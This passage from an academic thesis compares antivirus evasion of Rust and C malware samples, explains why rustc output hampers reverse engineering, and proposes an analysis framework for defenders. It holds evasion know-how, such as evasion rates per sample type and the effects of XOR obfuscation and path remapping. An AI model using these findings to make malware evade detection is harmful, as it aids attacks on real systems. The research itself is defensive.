Encrypt files                                  69              1            0               98.57
Create files                                   69              1            0               98.57
Modify file                                    54              15           1               77.85
Simple reverse shell                           35              35           0               50
Simple bind shell                              58              12           0               82.857
Obfuscated reverse shell                       35              35           0               50
Obfuscated bind shell                          56              14           0               80
Hosts file exfiltration using email            55              15           0               78.57
Edge browser history exfiltration using email  55              15           0               78.571
Edge browser cookies exfiltration using email  55              15           0               78.571
Hosts file exfiltration using DNS              64              6            0               91.42
Edge browser history exfiltration using DNS    63              7            0               90
Edge browser cookies exfiltration using DNS    63              7            0               90
Delete registry key                            58              12           0               82.85
Modify registry key                            57              13           0               81.42
Add registry key                               58              12           0               82.85
Simple keylogger                               67              3            0               95.71
Keylogger that sends file with data via DNS    66              4            0               94.28
Keylogger that sends file with data via email  64              6            0               91.42

Table 13. Calculation of the evasion% of malware written in the Rust programming language.
Sub-category of Malware in the
Rust Programming Language                      Undetected (1)  Malware (0)  Grayware (0.5)  Evasion %
Delete files                                   69              1            0               98.57
Encrypt files                                  68              1            1               97.85
Create files                                   68              1            1               97.85
Modify file                                    68              1            1               97.85
Simple reverse shell                           68              1            1               97.85
Simple bind shell                              70              0            0               100
Obfuscated reverse shell                       69              1            0               98.57
Obfuscated bind shell                          70              0            0               100
Hosts file exfiltration using email            70              0            0               100
Edge browser history exfiltration using email  70              0            0               100
Edge browser cookies exfiltration using email  70              0            0               100
Hosts file exfiltration using DNS              68              1            1               97.85
Edge browser history exfiltration using DNS    67              3            0               95.71
Edge browser cookies exfiltration using DNS    67              3            0               95.71
Delete registry key                            68              2            0               97.14
Modify registry key                            69              1            0               98.57
Add registry key                               69              1            0               98.57
Simple keylogger                               67              3            0               95.71
Keylogger that sends file with data via DNS    69              1            0               98.57
Keylogger that sends file with data via email  68              2            0               97.14

Table 14. Results of comparison of the evasion% of malware written in the C and Rust programming
languages.

Results of Comparison                                  Count   % of malware
Equal evasion                                          2       10
Malware in the C programming language evades more      2       10
Malware in the Rust programming language evades more   16      80

Average Difference in evasion %                        % evasion
Malware in the C programming language evades more      0.71
Malware in the Rust programming language evades more   18.3

As observed in Table 14, 80% of the malware samples written in the Rust programming
language evaded antivirus detection more than their C counterparts, with an average
difference of 18.3% in the evasion. Only 10% of the malware samples showed equal antivirus
evasion in the C and Rust programming languages. Similarly, only 10% of the malware
samples written in C evaded more than those written in the Rust programming language, with
an average difference of 0.71%.
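
The figures in Table 14 can be recomputed from the counts in Tables 12 and 13. The following is a minimal sketch, not the script used in this thesis; the function names and the half-point representation of the weights (chosen so that equal scores compare exactly) are assumptions made for illustration.

```python
# (undetected, grayware) counts per sample, in the row order of Table 12 (C)
# and Table 13 (Rust). Results labeled as malware carry a weight of 0.
C_ROWS = [(69, 0), (69, 0), (69, 0), (54, 1), (35, 0), (58, 0), (35, 0),
          (56, 0), (55, 0), (55, 0), (55, 0), (64, 0), (63, 0), (63, 0),
          (58, 0), (57, 0), (58, 0), (67, 0), (66, 0), (64, 0)]
RUST_ROWS = [(69, 0), (68, 1), (68, 1), (68, 1), (68, 1), (70, 0), (69, 0),
             (70, 0), (70, 0), (70, 0), (70, 0), (68, 1), (67, 0), (67, 0),
             (68, 0), (69, 0), (69, 0), (67, 0), (69, 0), (68, 0)]


def half_points(undetected: int, grayware: int) -> int:
    """Weighted score of Equation 3 in units of 0.5, kept as an exact integer."""
    return 2 * undetected + grayware


def summarize(c_rows, rust_rows, total: int = 70) -> dict:
    """Count which language evades more and average the evasion% differences."""
    diffs = [half_points(*r) - half_points(*c) for c, r in zip(c_rows, rust_rows)]
    rust_more = [d / 2 / total * 100 for d in diffs if d > 0]
    c_more = [-d / 2 / total * 100 for d in diffs if d < 0]
    return {
        "equal": diffs.count(0),
        "c_more": len(c_more),
        "rust_more": len(rust_more),
        "avg_c_more": sum(c_more) / len(c_more) if c_more else 0.0,
        "avg_rust_more": sum(rust_more) / len(rust_more) if rust_more else 0.0,
    }


for key, value in summarize(C_ROWS, RUST_ROWS).items():
    print(key, round(value, 2))
```

Comparing integer half-point scores avoids floating-point ties being misclassified when two samples have the same evasion percentage.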

5.2.1 Summary of Results of Experiment 2

To summarize, the results support the second hypothesis H2. Extending the previous
answer to the research questions RQ1 and RQ2, malware written in the Rust programming
language evades antivirus tools considerably better than malware written in C.

6 Discussion
This chapter presents detailed analysis of the results presented in Chapter 5, to discuss their
meaning and implications.

6.1 Larger Binary Size of the Malware Written in the Rust Programming Language
This section discusses three factors that were found to be contributing to the larger binary size
of malware written in the Rust programming language.

6.1.1 Standard and Runtime Libraries

The standard library [105] of the Rust programming language is a collection of functionality
for common operations such as input/output, threading, networking, data structures, and error
handling. The standard library is designed to provide a consistent API for programs written in
the Rust programming language regardless of the underlying operating system, thus allowing
for cross-compilation.

The Rust programming language’s runtime library [106] is a collection of multiple libraries
that provide low-level support for things like thread creation [107], synchronization [108],
and system calls [109]. This enables programs written in the Rust programming language to
achieve high performance and low memory usage, while still providing access to essential
platform-specific functionality.

A large portion of the standard and runtime libraries is bundled into the binary during
compilation by the rustc compiler. This makes the binaries of malware written in the Rust
programming language larger than their C counterparts [110]. The increased size is a tradeoff
for the Rust programming language's safety, memory management, and performance features.

6.1.2 Default Dependency Linkage

Cargo, the Rust programming language’s package manager, by default statically links the
crates, which are external library dependencies [110], [111]. Due to this, all the code for the
external dependencies is bundled with the binary along with the standard and runtime
libraries during compilation. The increased size is a tradeoff for the ease of deployment and
distribution of binaries by statically linking external dependencies.

6.1.3 Inlining and Loop Unrolling for Optimization

The rustc compiler uses an optimization technique called inlining to improve performance.
Inlining [112], [113] is the process of replacing a function call with the actual code of the
function. This eliminates the overhead of the function call and improves performance.
However, it can also increase the size of the binary because the code of the function may be
duplicated at every call site. An example of this is observed in Figure 11 in Section 5.1.4,
where the function call to “is_valid” has been replaced by its code in the “main” function.

Another optimization technique used by the rustc compiler is loop unrolling. Loop unrolling
[114], [115] involves duplicating the body of a loop in the generated code to reduce the
overhead of loop control instructions. This also results in a binary containing multiple copies
of the loop body, thus increasing its size. The rustc compiler provides several optimization
levels [116], ranging from “opt-level=0” for no optimization to “opt-level=3” for aggressive
optimization. The “--release” mode of compilation uses “opt-level=3” by default. As the
optimization level increases, the compiler may generate more code which could increase the
binary size.

6.2 More Identifiable Strings in the Malware Written in the Rust Programming Language
Binary stripping is the process of removing debug symbols and unnecessary information
about the binary or the developer environment [117]. It was observed that despite stripping
the binary and compiling it in “--release” [118] mode, the binary contained strings that
expose the home directory of the system on which the program was compiled. This has been
raised as a privacy concern by several members of the open-source community on GitHub
[119]; however, a proper fix has not yet been deployed.

Several workarounds have been proposed to prevent this, such as remapping the home
directory to a random string using “--remap-path-prefix
{home_directory}={random_identifier}” [120]. However, this is also not a foolproof solution,
as discussed by the author of the OffensiveRust [121] project on GitHub. From an attacker’s
perspective, the exposed path can reveal more details about them. From a defender’s
perspective, such an exposure could reveal more information that could help the malware
analysis process.
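
From the defender’s side, leaked home directories can be searched for automatically. The following is a minimal sketch under stated assumptions: the Windows pattern follows the path shown in Table 8 (C:\Users\m\.cargo), whereas the “/home/” and “/Users/” variants and the function name are assumptions introduced here for binaries compiled on other systems.

```python
import re

# A home directory followed by a ".cargo" component. Only the Windows form is
# taken from the thesis; the two Unix-style prefixes are assumed.
HOME_PATH = re.compile(
    rb"(?:[A-Za-z]:\\Users\\|/home/|/Users/)([^\\/\x00]+)[\\/]\.cargo"
)


def leaked_usernames(data: bytes) -> set:
    """Return the user names found in embedded '.cargo' paths."""
    return {m.group(1).decode("ascii", "replace") for m in HOME_PATH.finditer(data)}


# Synthetic bytes standing in for a binary. A real sample would be read with
# open(path, "rb").read().
sample = b"\x00C:\\Users\\m\\.cargo\\registry\\src\\index\x00"
print(leaked_usernames(sample))
```

An empty result does not prove that the path was remapped or removed, since other build paths may still be embedded in the binary.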

6.3 Limitations of Existing Reverse Engineering Tools


This section discusses the two main limitations of Ghidra and IDA Free in handling the
intricacies of the rustc compiler when reverse engineering binaries written in the Rust
programming language.

6.3.1 Name Mangling

Mangling [122] is a name decoration scheme used by the rustc compiler to uniquely identify
functions and other symbols in the resulting binary file. This scheme encodes information
about a symbol's name, arguments, return type, and other attributes into a mangled string,
which is used as the symbol's actual name in the binary file. It is necessary to prevent naming
conflicts and enable the linker to correctly link symbols between different object files [123].

In Ghidra, the symbol tree is displayed on the left side in a “Symbol Tree” window [124]. In
IDA, it is displayed in the “Names” window [125]. When reverse engineering, analyzing the
symbol tree can help identify key functions and variables. As shown in Figure 5 in Section
5.1.4, the symbol tree of the C program was used to quickly navigate to the main function.
However, this was not possible for the program written in the Rust programming language
because tools like Ghidra and IDA could not de-mangle the symbols or work around them to
recreate the symbol tree.
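
To illustrate what de-mangling involves, the sketch below decodes the path components of a symbol in rustc's legacy mangling scheme, in which a symbol starts with “_ZN”, lists length-prefixed path components, and ends with a hash component followed by “E”. It is a simplified illustration and not a replacement for a real demangler: escape sequences such as “$LT$” and the newer v0 scheme (symbols starting with “_R”) are not handled, and the example symbol is hand-constructed with a dummy hash.

```python
import re

_HASH = re.compile(r"h[0-9a-f]{16}")


def demangle_legacy(symbol: str):
    """Return 'a::b::c' for a legacy-mangled Rust symbol, or None if it does not parse."""
    if not (symbol.startswith("_ZN") and symbol.endswith("E")):
        return None
    body, pos, parts = symbol[3:-1], 0, []
    while pos < len(body):
        match = re.match(r"\d+", body[pos:])
        if not match:
            return None
        length = int(match.group())
        start = pos + match.end()
        part = body[start:start + length]
        if len(part) != length:
            return None  # truncated component
        parts.append(part)
        pos = start + length
    if parts and _HASH.fullmatch(parts[-1]):
        parts.pop()  # drop the trailing hash component
    return "::".join(parts) or None


# Hand-constructed symbol with a dummy hash, used only for illustration.
print(demangle_legacy("_ZN3std2rt10lang_start17h0123456789abcdefE"))
```

When a binary is stripped, these symbol names are not available in the first place, in which case no demangler can recover them and the analyst has to rely on strings and code structure.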

6.3.2 Additional Code Added for Exception Handling

In Rust, exception handling is implemented using the “panic” mechanism, which is a form of
unwinding the stack in response to a runtime error [126], [127], [128]. When the Rust
compiler detects a potential panic condition, it generates additional code in the binary to
perform runtime checks and ensure that the panic is handled correctly.

As noticed in Figure 10 in Section 5.1.4, the rustc compiler generated additional code in the
binary to handle the “InvalidInstructionException”. Since this code is not part of the original
source, it increases the complexity of analyzing the decompiled or disassembled binary. In
addition to the exception handling code, the rustc compiler may also generate additional code
to check for null pointers, validate input data types, or enforce bounds checks. It is also
worth noting that the code added by the compiler for optimization, as explained in Section
6.1.3, also contributes to the complexity of analysis.

6.4 Limitations of Existing Detection Systems


Signature-based detection compares the signature of a file with a database of known malware
signatures [129]. Although this method is effective against known malware, it cannot detect
new or modified malware that is not in the database [130]. This allows attackers to create
new variants of existing malware or rewrite existing malware in a new programming
language to avoid detection by antivirus systems.

Code obfuscation is a technique used by malware authors to alter the code or code-flow of the
malware to evade detection [131], [132]. As explained in Sections 6.3.2 and 6.1.3, the
additional code added for optimization and exception handling by the rustc compiler
makes it difficult to understand the purpose and exact behavior of the binary.
Furthermore, when obfuscation using XOR encoding was explicitly applied to the command
shells during testing, results showed that the obfuscated command shells further evaded
detection. Hence, this feature of the Rust programming language offers a great advantage to
malware authors as it makes code obfuscation simpler.

Packing is another technique used by malware authors which involves compressing the
malware's code to evade detection [133], [134]. The malware written in the Rust
programming language exhibits characteristics of a packed binary when it is compiled in the
“--release” mode and stripped. This is another advantage for malware authors as it allows the
malware written in the Rust programming language to evade detection better than their C
counterparts.
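
One heuristic that analysts commonly use to flag possibly packed or compressed content is byte entropy. The following is a minimal sketch of that heuristic only; it is an assumption made for illustration and not necessarily the characteristic observed in this thesis, and the function name is hypothetical.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum(n / total * math.log2(n / total) for n in counts.values())


# Synthetic inputs standing in for sections of a binary.
print(shannon_entropy(b"\x00" * 64))       # constant bytes
print(shannon_entropy(bytes(range(256))))  # every byte value exactly once
```

Values close to 8 bits per byte are typical of compressed or encrypted data, whereas ordinary code and text usually score lower. Any cut-off used to label a binary as packed would be an analyst's choice and is deliberately not fixed here.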

Signature-based testing is usually followed by behavior-based detection using
dynamic analysis [135], [136]. When it comes to behavior-based detection of malware
written in the Rust programming language, results show that the above-mentioned features
led to a large number of false positives. Except for the obfuscated shells, none of the malware
samples written in the Rust programming language for experimentation were explicitly packed
or obfuscated. However, all results of the behavior-based detection by VirusTotal had a MITRE
ATT&CK finding of “T1027 Obfuscated Files or Information” [137] or “T1562.001 Creates
guard pages, often used to prevent reverse engineering and debugging” [138]. Despite these
MITRE ATT&CK findings, results also show that none of the sandboxes used for automated
dynamic analysis in VirusTotal reported them as malicious. This indicates that current
antivirus systems have limitations that make them ineffective against not just new malware,
but also existing malware that has been rewritten in a different programming language.

7 Recommended Analysis Framework
In an effort to answer the third research question RQ3, an analysis framework with four phases
is proposed. A comparison between the proposed framework and the traditional malware
analysis framework, which is currently used in most research [26], [139], [140], is
illustrated in Figure 15.

Figure 15. The recommended malware analysis framework.

The recommended analysis framework offers several advantages over the traditional
framework. Most importantly, it is more effective for identifying and analyzing malware
written in the Rust programming language. One of its strengths is its ability to quickly
identify the source language used to write the malware in the first phase itself, through string
analysis. This is critical because the analyst can plan ahead and select the appropriate tools
for the following phases of the analysis based on the source language used by the malware.
Additionally, the framework prioritizes saving time during dynamic analysis through a hybrid
approach. This is essential for efficient and thorough analysis of unknown malware. Finally,
the framework suggests open-source tools and extensions that can be used for
easier reverse engineering of malware written in the Rust programming language. Such a
framework was requested in 2019 in Ghidra’s GitHub issues [141].

7.1 Phase 1: Static Analysis


During malware analysis, several identifiers should be collected to help identify and classify
the malware. The file name may provide clues about the purpose and behavior of the
malware. The file size, creation date, and modification date are useful in determining the
timeline of the attack.

Other important identifiers include the file type and the target operating system. In particular,
it is important to look for embedded strings that are associated with the Rust programming
language as shown in Table 8 in Section 5.1.2. As discussed earlier, embedded strings within
the malware written using the Rust programming language could reveal information about the
malware author.

Metadata such as file permissions and ownership within the target system can provide
insights regarding the malware's capabilities and potential impact on the system. Finally, the
MD5, SHA-1, and SHA-256 hash values should be collected for Phase 2 of the analysis,
which is signature-based detection.

7.2 Phase 2: Signature-based detection


It is essential to first determine whether the file being analyzed is known malware. This can
be done using signature-based detection tools.

If the signature is the same as that of known malware, further analysis is not required.
However, if the signature is different and the detection tool flags the file as similar, or if
the file is undetected, then further investigation is required.

7.3 Phase 3: Hybrid Dynamic Analysis Approach
As seen in the results of this thesis, most of the malware written in the Rust programming
language evades signature-based detection. For this reason, it is important to focus on
dynamic analysis of malware for which identifiers of the Rust programming language were
found in Phase 1.

The results of this thesis also showed that automated dynamic analysis for behavior-based
detection is likely to generate more False Positives (FPs) and False Negatives
(FNs) for malware written in the Rust programming language. For this reason, a hybrid
approach for dynamic analysis is proposed in this framework. Hybrid malware analysis
leverages the strengths of manual and automated approaches to provide a more comprehensive
and accurate assessment of a malware sample [33].

When the analyst finds identifiers indicating that the malware is written in the Rust
programming language, it is recommended to start with manual dynamic analysis while the
automated tests run in the background. Some of the key behaviors to be noted during manual
dynamic analysis are:

• Modifications to the file system.

• Attempts to access sensitive or important resources.

• Network connections initiated or received.

• Registry manipulation (for Windows malware).

• Sub-processes spawned.

• Modifications to existing security controls (firewall, anti-virus, event loggers, etc.)

Once the manual dynamic analysis is completed, the analyst will have a basic understanding
of the behavior and intent of the malware. This understanding can be used to first rule out any
False Negatives (FNs) in the automated dynamic analysis report. After this, the analyst can
rule out some of the False Positives (FPs) based on the identifiers collected in Phase 1 and the
knowledge gained from the manual analysis. This reduces the number of findings that have to
be retested, thus making the process of ruling out the large number of False Positives (FPs)
easier.
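
The reconciliation step described above can be sketched with set operations. This is a simplified illustration and not a prescribed implementation: the function name, the result keys and the example report are hypothetical, and the technique identifiers are used only as labels.

```python
def triage(automated, observed, explained_by_phase1=frozenset()) -> dict:
    """Reconcile automated findings with manually observed behavior.

    automated:           findings in the automated dynamic analysis report
    observed:            behaviors confirmed during manual dynamic analysis
    explained_by_phase1: findings the analyst attributes to identifiers
                         collected in Phase 1 (an analyst judgment)
    """
    automated, observed = set(automated), set(observed)
    explained = set(explained_by_phase1)
    unconfirmed = automated - observed
    return {
        "false_negatives": observed - automated,  # missed by the automated report
        "confirmed": automated & observed,
        "ruled_out": unconfirmed & explained,     # treated as False Positives
        "retest": unconfirmed - explained,        # still needs manual retesting
    }


# Hypothetical report for a single sample.
result = triage(
    automated={"T1027", "T1562.001", "T1016"},
    observed={"T1016", "T1056"},
    explained_by_phase1={"T1027"},
)
for key, value in result.items():
    print(key, sorted(value))
```

Only the findings left in the "retest" group require further manual work, which is the reduction in effort that the hybrid approach aims for.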

7.4 Phase 4: Code Analysis


This phase of analysis within this framework is what differs the most from the traditional
malware analysis framework. Results of this thesis showed that reverse engineering or code
analysis of malware written in the Rust programming language was difficult in Ghidra and
almost impossible in IDA.

While researching to develop this framework, valuable open-source projects and independent
blogs aiming to improve the analysis of malware written in the Rust programming language
were discovered. They are discussed below.

7.4.1 Technique to Find the Main Function

Blog posts by Matt Ehrnschwender [142] and Tristan Messner [143] discuss techniques to
locate the address of the main function of a binary written in the Rust programming language
from its disassembled output. This is particularly useful for cases where tools like Ghidra and
IDA fail to create the symbol tree, as discussed in Sections 5.1.4 and 5.1.5.

The entry point of the program will initialize its stack cookie using "__security_init_cookie"
and perform some tasks to set up the execution environment. Then it will pass a reference to
the program's argument array, argument counter, and environment variables to a function that
will initialize the program’s main environment. Once the main environment is initialized, the
program will call “std::rt::lang_start_internal” or “std::rt::lang_start” depending on the
compiler version. The arguments to this call are the address of the main function of the
program that was written, as well as the program's argument array, environment variables
array, and argument counter. Locating this call during analysis will enable the analyst to
locate the address of the main function [142], [143].

7.4.2 GhidRust

GhidRust [144] is an open-source project hosted on GitHub that provides a Ghidra extension
for reverse engineering and analyzing binaries written in the Rust programming language.
At the time of writing this thesis, it is under active development and has minimal features,
such as detecting whether a malware sample is written in the Rust programming language and
converting the C-style decompiled output of Ghidra to its Rust programming language
equivalent.
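
As an illustration of what language detection can look like, the following minimal Python
sketch searches a binary for standard-library source paths of the form
“/rustc/<commit hash>/library/...”, which toolchains distributed by the Rust project commonly
leave in panic messages. This is an assumed heuristic for illustration only; it is not taken
from GhidRust, and the function names and sample bytes are hypothetical.

```python
import re
from typing import Optional

# Standard-library paths are commonly embedded as "/rustc/<40-hex commit hash>/library/...".
# Windows builds may use a backslash after the hash, so both separators are accepted.
_RUSTC_PATH = re.compile(rb"/rustc/([0-9a-f]{40})[/\\]")


def rustc_commit_hash(data: bytes) -> Optional[str]:
    """Return the rustc commit hash embedded in the binary, if one is found."""
    match = _RUSTC_PATH.search(data)
    return match.group(1).decode("ascii") if match else None


def looks_like_rust(data: bytes) -> bool:
    """Heuristic: treat the presence of a /rustc/<hash>/ path as a sign of Rust."""
    return rustc_commit_hash(data) is not None


# Hypothetical bytes standing in for the contents of a sample.
sample = (
    b"\x00MZ\x90\x00"
    b"/rustc/0123456789abcdef0123456789abcdef01234567\\library\\core\\src\\fmt\\mod.rs"
    b"\x00"
)
print(looks_like_rust(sample), rustc_commit_hash(sample))
```

A negative result does not prove that a sample was written in another language, because these
paths can be removed or remapped at build time.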

7.4.3 GhidraRustDependenciesExtractor

GhidraRustDependenciesExtractor [145] is an open-source project hosted on GitHub that
provides a Ghidra extension for extracting the crates used by a binary written in the Rust
programming language. At the time of writing this thesis, this project is also being actively
developed.
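
One way crate information can be recovered is from the source file paths that remain in a
release binary (see [119]). The following minimal Python sketch assumes that dependencies were
fetched through Cargo, so that their paths contain “registry/src/<index>/<crate>-<version>/”.
It is not taken from GhidraRustDependenciesExtractor; the function name and the sample bytes
are hypothetical.

```python
import re
from typing import Set, Tuple

# Cargo unpacks dependencies under ".../registry/src/<index>/<crate>-<version>/...".
# Both path separators are accepted so that Windows and Unix build hosts are covered.
_CRATE_PATH = re.compile(
    rb"registry[/\\]src[/\\][^/\\\x00]+[/\\]"
    rb"([A-Za-z0-9_\-]+?)-(\d+\.\d+\.\d+[0-9A-Za-z.+\-]*)[/\\]"
)


def extract_crates(data: bytes) -> Set[Tuple[str, str]]:
    """Return the set of (crate name, version) pairs found in embedded paths."""
    return {
        (name.decode("ascii"), version.decode("ascii"))
        for name, version in _CRATE_PATH.findall(data)
    }


# Hypothetical bytes standing in for strings found in a sample.
sample = (
    b"\x00C:\\Users\\u\\.cargo\\registry\\src\\github.com-1ecc6299db9ec823"
    b"\\winapi-0.3.9\\src\\lib.rs\x00"
    b"/home/u/.cargo/registry/src/index.crates.io-6f17d22bba15001f"
    b"/aes-gcm-0.10.1/src/lib.rs\x00"
)
for crate_name, crate_version in sorted(extract_crates(sample)):
    print(crate_name, crate_version)
```

The crate list gives the analyst an early indication of the capabilities of a sample, such as
networking or cryptography, before any code is read.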

7.4.4 DemangleRust.py

DemangleRust.py [146] is an open-source code snippet hosted on GitHub that provides a
Ghidra extension for demangling the symbols of a binary written in the Rust programming
language using the v0 version of the mangling scheme. However, it has not been updated
since 2022.
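
Before choosing a demangler, it helps to know which scheme a symbol uses. The following
minimal Python sketch classifies a symbol as v0 (prefix “_R”) or legacy (prefix “_ZN” with a
trailing “17h” hash component) and decodes the path of a simple legacy symbol. It is not taken
from DemangleRust.py and does not decode v0 symbols or legacy escape sequences such as “$LT$”;
the function names and example symbols are hypothetical.

```python
import re
from typing import Optional

_LEGACY_HASH = re.compile(r"h[0-9a-f]{16}")


def mangling_scheme(symbol: str) -> str:
    """Classify a symbol as 'v0', 'legacy', or 'unknown'."""
    if symbol.startswith("_R"):
        return "v0"
    if symbol.startswith("_ZN") and re.search(r"17h[0-9a-f]{16}E$", symbol):
        return "legacy"
    return "unknown"


def demangle_legacy_path(symbol: str) -> Optional[str]:
    """Decode the length-prefixed path of a legacy symbol and drop its hash."""
    if mangling_scheme(symbol) != "legacy":
        return None
    body = symbol[3:-1]  # strip the "_ZN" prefix and the "E" terminator
    parts = []
    pos = 0
    while pos < len(body):
        digits = re.match(r"\d+", body[pos:])
        if digits is None:
            return None
        length = int(digits.group())
        pos += digits.end()
        ident = body[pos:pos + length]
        if len(ident) != length:
            return None  # truncated or malformed symbol
        parts.append(ident)
        pos += length
    if parts and _LEGACY_HASH.fullmatch(parts[-1]):
        parts.pop()  # the final component is the disambiguating hash
    return "::".join(parts)


# Hypothetical example symbols.
print(mangling_scheme("_RNvCs1234_7mycrate4main"))
print(demangle_legacy_path("_ZN4core3fmt5write17h0123456789abcdefE"))
```

Symbols classified as v0 can then be passed to a v0-aware demangler, while legacy symbols can
be handled by any demangler that supports the older scheme.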

7.5 Limitations and Future Work


Despite the strengths of the framework, there are some limitations that need to be addressed.
The framework still requires manual work, which can be prone to errors. Using multiple
open-source extensions brings challenges in terms of seamless integration, which can impact
the ease of the analysis. Moreover, relying on a small community of open-source developers
makes it difficult to get end-user support, especially if a project is discontinued in the future.

To meet the current needs of malware analysis, it is crucial for tool vendors to integrate the
functionalities provided by these extensions into their tools. This will ensure seamless
operation and provide better support for end-users. With these functionalities integrated,
users will not have to rely on multiple open-source tools for analysis, which will reduce the
manual effort required and enhance the accuracy of the analysis.

Future work involves the creation of a single tool that can automate the phases outlined in
this framework. Such a tool would reduce the need for manual work and streamline the
analysis process. Another approach to improving the framework would be to enhance existing
tools or contribute to the open-source tools recommended in the framework. Additionally,
tool vendors should integrate the functionalities of these extensions into their tools. Overall,
the framework is a valuable starting point for analyzing malware in the Rust programming
language, but it is important to implement improvements which will help address the current
limitations and make the analysis process more accurate, efficient, and analyst-friendly.

8 Conclusion
This thesis investigates the characteristics of the Rust programming language that have
facilitated its use in the creation of malware and the shortcomings of current analysis tools in
addressing this issue, and it proposes potential solutions for remedying them. A mixed-methods
approach was adopted, involving a Systematic Literature Review and cause-effect
experimentation. This approach provided a comprehensive and robust research methodology.

Through the Systematic Literature Review, it was found that academic and individual research
in this field is scarce compared to industrial research. Results of the cause-effect
experimentation showed that the intricacies of the rustc compiler, which were intended
to improve performance and security, contribute to the complexity of analyzing and detecting
malware written in the Rust programming language. Existing analysis and detection tools
are not equipped with functionalities that handle these intricacies. Based on these findings,
a practical framework has been proposed to ease the analysis of malware written in the
Rust programming language.

The contributions of this thesis are multifold. The detailed analysis of literature provided a
comprehensive overview of the research gaps and challenges faced by researchers when
studying malware written in the Rust programming language. The results of the
experimentation offer valuable insights into why the above-mentioned gaps and challenges
occur and what can be done to overcome them. Finally, the proposed framework serves as a
starting point for future research in this field by offering a practical solution to address the
identified gaps and challenges. Overall, this thesis offers a significant contribution to the
literature on this topic, and its findings have practical implications for researchers and
practitioners in this field.

References
[1] O. Or-Meir, N. Nissim, Y. Elovici, and L. Rokach, “Dynamic Malware Analysis in the Modern Era - A
State of the Art Survey,” ACM Computing Surveys (CSUR), vol. 52, no. 5, pp. 1–48, 2019.
[2] L. Koch, S. Oesch, A. Chaulagain, M. Adkisson, S. Erwin, and B. Weber, “Toward the Detection of
Polyglot Files,” in Proceedings of the 15th Workshop on Cyber Security Experimentation and Test, 2022,
pp. 120–128.
[3] Statista, “Number of malware attacks per year 2015-H1 2022.”
https://www.statista.com/statistics/873097/malware-attacks-per-year-worldwide/ (accessed Aug. 04,
2022).
[4] BlackBerry, “BlackBerry 2022 Threat Report,” Waterloo, Canada, White Paper, 2022. Accessed: Oct.
10, 2022. [Online]. Available: https://www.blackberry.com/us/en/forms/enterprise/report-bb-2022-threat-
report-pi
[5] BlackBerry Research & Intelligence, “Old Dogs, New Tricks: Attackers adopt exotic
programming languages,” Waterloo, Canada, White Paper, 2022. Accessed: Oct. 10, 2022. [Online].
Available: https://www.blackberry.com/us/en/forms/enterprise/report-old-dogs-new-tricks
[6] ITPro, “Why are ransomware gangs pivoting to Rust?,” 2022.
https://www.itpro.co.uk/security/ransomware/368476/why-are-ransomware-gangs-pivoting-to-rust
(accessed Aug. 04, 2022).
[7] Rust Blog, “Announcing Rust 1.0.” https://blog.rust-lang.org/2015/05/15/Rust-1.0.html (accessed Dec.
10, 2022).
[8] Mozilla, “Mozilla Welcomes the Rust Foundation,” 2021. https://blog.mozilla.org/en/mozilla/mozilla-
welcomes-the-rust-foundation/ (accessed Dec. 10, 2022).
[9] H. Okhravi, N. Burow, R. Skowyra, B. C. Ward, S. Jero, R. Kazan, and H. Shrobe, “One Giant Leap for
Computer Security,” IEEE Security & Privacy, vol. 18, no. 4, pp. 8–19, 2020.
[10] W. Bugden and A. Alahmar, “Rust: The Programming Language for Safety and Performance,” arXiv
preprint arXiv:2206.05503, 2022.
[11] M. Emre, R. Schroeder, K. Dewey, and B. Hardekopf, “Translating C to Safer Rust,” Proceedings of the
ACM on Programming Languages, vol. 5, no. OOPSLA, pp. 1–29, 2021.
[12] Rust For Linux, “Github: Organization for adding support for the Rust language to the Linux kernel.”
https://github.com/Rust-for-Linux (accessed Sep. 05, 2022).
[13] W. Filho, “Writing Linux Kernel Modules In Rust.” https://www.linuxfoundation.org/webinars/rust-for-
linux-writing-abstractions-and-drivers (accessed Sep. 05, 2022).
[14] M. Ojeda, “Rust For Linux: Writing Safe Abstractions & Drivers.”
https://www.linuxfoundation.org/webinars/rust-for-linux-writing-abstractions-and-drivers (accessed Sep.
05, 2022).
[15] K. Merriman, B. Campbell, and S. Larson, “New Variant of Buer Loader Written in Rust,” 2021.
Accessed: Aug. 10, 2022. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/new-
variant-buer-loader-written-rust
[16] Microsoft Security, “Hive ransomware gets upgrades in Rust,” 2022. Accessed: Aug. 10, 2022.
[Online]. Available: https://www.microsoft.com/en-us/security/blog/2022/07/05/hive-ransomware-gets-
upgrades-in-rust/
[17] J. Von Neumann, A. W. Burks, and others, “Theory of self-reproducing automata,” IEEE Transactions
on Neural Networks, vol. 5, no. 1, pp. 3–14, 1966.
[18] A. W. Burks, “Von Neumann’s self-reproducing automata,” MICHIGAN UNIV ANN ARBOR LOGIC
OF COMPUTERS GROUP, 1969.
[19] Kaspersky, “A Brief History of Computer Viruses & What the Future Holds.” Accessed: Aug. 10, 2022.
[Online]. Available: https://me-en.kaspersky.com/resource-center/threats/a-brief-history-of-computer-
viruses-and-what-the-future-holds
[20] Fortinet, “A Brief History of The Evolution of Malware,” 2022. Accessed: Mar. 14, 2023. [Online].
Available: https://www.fortinet.com/blog/threat-research/evolution-of-malware
[21] S. K. Sahay, A. Sharma, and H. Rathore, “Evolution of malware and its detection techniques,” in
Information and Communication Technology for Sustainable Development: Proceedings of ICT4SD
2018, Springer, 2020, pp. 139–150.

[22] M. N. Alenezi, H. Alabdulrazzaq, A. A. Alshaher, and M. M. Alkharang, “Evolution of malware threats
and techniques: A review,” International journal of communication networks and information security,
vol. 12, no. 3, pp. 326–337, 2020.
[23] F. Touchette, “The evolution of malware,” Network Security, vol. 2016, no. 1, pp. 11–14, 2016.
[24] M. Egele, T. Scholte, E. Kirda, and C. Kruegel, “A survey on automated dynamic malware-analysis
techniques and tools,” ACM computing surveys (CSUR), vol. 44, no. 2, pp. 1–42, 2008.
[25] E. Gandotra, D. Bansal, and S. Sofat, “Malware analysis and classification: A survey,” Journal of
Information Security, vol. 2014, 2014.
[26] M. Sikorski and A. Honig, Practical malware analysis: the hands-on guide to dissecting malicious
software. No Starch Press, 2012.
[27] A. Ray and A. Nath, “Introduction to Malware and Malware Analysis: A brief overview,” International
Journal, vol. 4, no. 10, 2016.
[28] R. Sihwail, K. Omar, and K. Z. Ariffin, “A survey on malware analysis techniques: Static, dynamic,
hybrid and memory analysis,” International Journal on Advances in Science, Engineering and
Information Technology, vol. 8, no. 4–2, pp. 1662–1671, 2018.
